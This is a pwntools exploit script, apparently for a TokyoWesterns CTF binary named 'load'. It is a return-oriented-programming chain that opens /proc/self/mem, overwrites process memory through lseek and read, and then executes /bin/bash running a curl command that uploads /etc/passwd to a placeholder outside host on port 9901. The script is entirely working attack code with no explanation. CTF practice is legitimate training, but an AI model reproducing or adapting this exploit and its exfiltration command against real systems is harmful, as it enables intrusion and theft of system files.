from pwn import *

debug=1

context.log_level='debug'
context.arch='amd64'

if debug:
p=process('./load')
gdb.attach(p)
else:
p=remote('pwn1.chal.ctf.westerns.tokyo',34835)

def ru(x):
return p.recvuntil(x)

def se(x):
p.send(x)

prdi=0x400a73
puts=0x4006C0
prsi=0x400a71
prbp=0x400780
leave=0x4008a7
bss=0x601040
read=0x4006E8
mopen=0x0400710
lseek=0x4006D8

ru('Input file name:')
name='/dev/stdin\x00/proc/self/mem\x00' # 26
name+='/bin/bash\x00-c\x00' # 37

#command
name+='curl -F "e=@/etc/passwd" XXXXXX.XXXX:9901\x00'
name=name.ljust(86,'\x00') # 86
name+=p64(0x4008D6) # 94
name+=flat(bss+26,bss+29+5,bss+32+5,0) # 110
name+='\x7b'

se(name)
ru('Input offset: ')
se('0\n')
ru('Input size: ')
se(str(0x600)+'\n')

sleep(0.4)

def gadgets(rdi,rsi,rdx):
return flat(0x400A6A,0,0,bss+86,rdx,rsi,rdi,0x400A50)

payload='a'*48+flat(bss+0x20,gadgets(bss+11,0,0x1000),mopen)
payload+=flat(gadgets(0,0x600FC8,0),lseek)
payload+=flat(gadgets(0,bss+0x200,0x8),read)
payload+=flat(gadgets(0,bss+0x80-2,0),lseek)
payload+=flat(gadgets(0,bss+0x200,0x1),read)
payload+=flat(gadgets(0,bss+0x300,59),read)
payload+=flat(0x400A6A,0,0,bss+0x200,0,bss+86+8,bss+26,0x400A50)

se(payload)

ru('Load file complete!')

p.interactive()